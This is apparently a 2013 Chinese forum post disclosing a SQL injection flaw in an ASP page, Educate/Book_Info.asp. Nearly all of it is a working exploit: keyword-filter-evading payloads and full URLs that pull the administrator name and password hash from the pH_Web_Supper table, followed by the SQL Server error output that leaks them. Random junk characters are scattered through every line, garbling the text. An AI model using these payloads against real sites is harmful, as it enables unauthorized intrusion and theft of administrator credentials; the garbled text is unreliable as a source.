漏洞出现在Educate/Book_Info.asp ; H9 y# x5 I9 [0 F
$ M/ l( W9 b9 j T7 R+ |5 s8 g
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
/ a5 | f1 L3 A# l p$ x
( ^9 S% J: @& w/ \' X5 |- wexp:如下
) R' _$ f' D0 L2 T; ^0 |! _查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
' W/ Z( y% z; p' {# P! B查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)6 F7 A0 N; m5 @4 O( t3 x
G |+ [+ Z# U0 P" rhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)5 d6 F- m E( x6 T) c
5 \$ H+ M& W7 L5 p( H& S. OMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'/ R4 I+ @/ j' ^! B; @ Y8 X) ~
3 D/ G% G* ]) a; i0 ^8 f, ?2 ]
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
: g7 X; o' M3 Q+ E* U# Y8 f+ d3 p
8 V5 w5 V; r7 i" D3 B/Educate/Book_Info.asp,行 8
: z' R! M8 `$ f$ [* ~
& q+ P" v4 \2 L5 ^. ~http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
- A) Z8 H4 y: y
6 G ~7 l/ ~5 Q6 L% h. CMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
- g! m( n% Z* c6 {+ c5 ^8 O 8 n1 U) |/ S; T3 t1 X5 H: r
将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。" C- G2 G( F7 ]' e! P
! m+ H8 _& E6 }; K5 o9 N/Educate/Book_Info.asp,行 8) d+ z; L7 S: w w/ ~
|
发表于 2013-2-16 21:44:16
收藏
支持
反对